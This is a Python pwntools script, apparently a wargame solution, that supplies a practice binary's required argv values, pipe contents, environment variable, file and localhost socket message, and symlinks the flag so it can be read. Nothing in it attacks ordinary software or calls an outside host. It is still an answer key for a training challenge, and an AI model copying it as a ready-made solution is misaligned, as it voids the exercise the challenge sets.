"""
Local exploit
Just walk through all the stages and take the flag.
"""
from pwn import *
# Keep this import AFTER `from pwn import *`: pwn's star-import also exports a
# `write` helper (pwnlib.util.misc), and the os names must shadow it.
from os import close, pipe, write
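def exploit():
    """Drive the five stages of the target and print whatever it sends back.

    Creates the ``flag`` symlink the target reads from, builds argv / stdio /
    env for stages 1-3, spawns the target, then services stages 4-5 while it
    runs. The target's output is read three times and printed; nothing is
    returned.
    """
    # Stage 0: symlink the flag into the cwd. Wait for `ln` to finish before
    # spawning the target so the link exists when it is opened; the original
    # dropped the handle without waiting and then reused its name.
    ln = process(['ln', '-s', '/home/input2/flag', 'flag'])
    ln.wait_for_close()
    ln.close()
    # Stage 1: argv contents.
    args = pass_stage1()
    # Stage 2: read ends of the pipes the target will see as stdin and stderr.
    r1, r2 = pass_stage2()
    # Stage 3: the environment variable the target checks.
    env = pass_stage3()
    p = process(executable='/home/input2/input', argv=args, stdin=r1, stderr=r2, env=env)
    # Stages 4 and 5 are serviced once the target is running.
    # NOTE(review): the stage-4 file is written after spawn, so this relies on
    # the target not opening it before pass_stage4() runs -- confirm.
    pass_stage4()
    pass_stage5()
    print(p.recv())
    print(p.recv())
    print(p.recv())
    p.close()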
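def pass_stage1():
    """Build the 100-element argv for stage 1.

    Returns:
        list[str]: argv with the program name at index 0, the two values the
        target compares at indices ord('A') and ord('B'), the port string used
        by pass_stage5() at ord('C'), and a non-empty filler string elsewhere.
    """
    # Filler: any non-empty string does; `*` replaces the comprehension whose
    # loop variable was never used.
    args = ['\x90'] * 100
    # argv[0] is the name the target is executed as.
    args[0] = './input'
    # The two conditions the target's source checks.
    args[ord('A')] = '\x00'
    args[ord('B')] = '\x20\x0a\x0d'
    # Port that pass_stage5() connects to; the two are kept in sync by hand.
    args[ord('C')] = '4444'
    return args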
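def pass_stage2():
    """Prepare the stdin and stderr pipes for stage 2.

    Each pipe is filled with the four bytes the target expects and its write
    end is then closed, so the reader sees exactly those bytes followed by
    EOF instead of a write descriptor that is never closed.

    Returns:
        tuple[int, int]: read-end descriptors (stdin, stderr) to hand to the
        target; the caller owns them.
    """
    stdin_r, stdin_w = pipe()
    stderr_r, stderr_w = pipe()
    # bytes literals: os.write() rejects str on Python 3, and \xff must reach
    # the pipe as one byte rather than a UTF-8 sequence.
    write(stdin_w, b'\x00\x0a\x00\xff')
    write(stderr_w, b'\x00\x0a\x02\xff')
    close(stdin_w)
    close(stderr_w)
    return stdin_r, stderr_r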
def pass_stage3():
    """Return the single environment variable the target checks in stage 3.

    NOTE(review): name and value are str literals; how they reach the child's
    environment as bytes is up to the caller's process() -- confirm.
    """
    name = '\xde\xad\xbe\xef'
    value = '\xca\xfe\xba\xbe'
    return {name: value}
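def pass_stage4():
    """Create the file the target reads in stage 4.

    Writes four NUL bytes to a file named "\\n" in the current directory. The
    file is opened in binary mode inside a ``with`` block so it is flushed and
    closed before the target reads it, instead of relying on the unreferenced
    handle being garbage-collected.
    """
    with open('\x0a', 'wb') as fh:
        fh.write(b'\x00\x00\x00\x00')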
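def pass_stage5():
    """Complete stage 5 by connecting to the target's local listener.

    Sends the four-byte value the target waits for and closes the connection
    afterwards; the original left the socket open until interpreter exit.
    The port is hard-coded to match args[ord('C')] in pass_stage1().
    """
    con = remote('localhost', 4444)
    try:
        con.sendline('\xde\xad\xbe\xef')
    finally:
        con.close()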
# Script entry point: run the whole chain only when executed directly.
if __name__ == '__main__':
    exploit()